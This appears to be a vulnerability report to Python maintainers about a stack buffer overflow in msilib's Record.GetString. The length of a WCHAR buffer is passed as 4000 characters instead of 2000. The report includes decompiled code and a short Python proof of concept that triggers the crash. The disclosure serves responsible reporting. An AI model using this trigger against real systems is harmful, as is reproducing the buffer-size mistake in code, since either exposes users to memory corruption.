Description
hello.
There is a stack buffer overflow of Record object in msilib
After brief analysis, I was able to find that implementation of Record.GetString methods has a stack overflow vulnerability.
It seem to be implemented in msi.pyd file.
Vulnerable code snippet is below. pccValueBuf is the length of MsiRecordGetStringW() API, szValueBuf is a output buffer also this buffer has 4000 byte space from rsp, which means 2000 size of WCHAR.
I think there is slight mistake to calculate the buffer size.
Despite WCHAR is 2 byte, output size is still 4000, therefore stack buffer overflow could be happen.
v3 = PyLong_AsUnsignedLongMask(a2);
if ( v3 == -1 && PyErr_Occurred() )
return 0i64;
v5 = *(_DWORD *)(a1 + 16);
pcchValueBuf[0] = 4000;
v6 = szValueBuf;
StringW = MsiRecordGetStringW(v5, v3, szValueBuf, pcchValueBuf);
Test environment is Windows 10 as well as python version is 3.10.6
This bug can triggered by below PoC code.
import msilib
import msilib.schema
database = msilib.init_database('test', msilib.schema, 'testProduct', msilib.gen_uuid(), 'testVersion', 'testManufacturer')
records = [('a',1,'c','d'*2000)]
msilib.add_data(database, 'CustomAction', records)
database.Commit()
database.Close()
database = msilib.OpenDatabase('test', msilib.MSIDBOPEN_READONLY)
view = database.OpenView("select Target from CustomAction where `Action`= 'a'")
view.Execute(None)
record = view.Fetch()
record.GetString(1)
Feel free to any question and If any what I have to know, please let me know.
Best Regards.
Thank you.